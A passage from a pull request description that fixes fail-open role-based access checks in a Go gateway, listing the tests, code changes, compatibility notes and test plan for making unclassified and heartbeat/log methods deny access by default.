heartbeat.get.ok=false code=INVALID_REQUEST          # RBAC passed; only validation rejected nil agentId
```

## Unit tests

```
go test ./internal/permissions/...   ok (0.542s)
go test ./internal/gateway/...       ok (0.621s / 1.201s)
go build ./...                       ok
go build -tags sqliteonly ./...      ok
go vet ./...                         ok
```

Tests locking in fail-closed behaviour:
- `TestCanAccess_UnknownMethod_DeniedForAll` — unclassified method denied for every role (inverts the removed default-permit test).
- `TestCanAccess_CVE866_HeartbeatAndLogs` — `heartbeat.set`, `heartbeat.toggle`, `heartbeat.test`, `heartbeat.checklist.set`, `logs.tail` require admin.
- `TestCanAccess_PublicMethods` — `connect`, `health`, `status`, `browser.pairing.status` remain reachable by all roles.
- `TestMethodRole_ApprovalsList_IsViewer` — locks in the `writePrefixes` removal fix.
- `TestMethodRole_DriftCoverage_AllProtocolMethodsClassified` — parses `pkg/protocol/methods.go` at test time and asserts every `Method*` constant resolves to a non-`RoleNone` role; catches future allowlist gaps before ship.

## Changes

- `internal/gateway/router.go`: Path 4 fails closed with `UNAUTHORIZED`; dispatcher distinguishes "role too low" vs "unclassified method" for cleaner error + `security.permission_denied` structured log.
- `internal/permissions/policy.go`: add `RoleNone` sentinel; `CanAccess` denies it; `MethodRole` rewritten to fail-closed with explicit public / admin / write / read allowlists. `isWriteMethod` uses exact-match `writeExact` only (`writePrefixes` removed per review). `isReadMethod` enumerates viewer-reachable RPCs. 12 Phase-3 methods (TTS/browser/zalo/whatsapp) classified.
- `internal/permissions/policy_test.go`: fail-closed + drift-coverage + ApprovalsList lock-in tests.

Note: the two reproduction scripts are deliberately **not** committed — `scripts/` is reserved for install/setup tooling. Scripts live inline in this PR body for reviewer copy-paste; see `<details>` blocks above.

## Backward compatibility

- **Path 2 preserved**: when `gateway.token` is unset (dev / onboard flow), unauthenticated connections still receive `RoleOperator` — same as before. No behaviour change for local dev setups.

## Test plan

- [x] Reproduce all 3 vulns on live upstream image (pre-patch)
- [x] Verify all 3 vulns closed on patched binary (post-patch)
- [x] Reproduce `writePrefixes` shadowing bug with standalone Go script (exit 1)
- [x] Verify fix with same script post-removal (exit 0)
- [x] Verify admin happy-path (valid token → `heartbeat.get` reaches handler)
- [x] `go build ./...` + `go build -tags sqliteonly ./...`
- [x] `go vet ./...`
- [x] `go test ./internal/permissions/... ./internal/gateway/...`

Fixes #866.
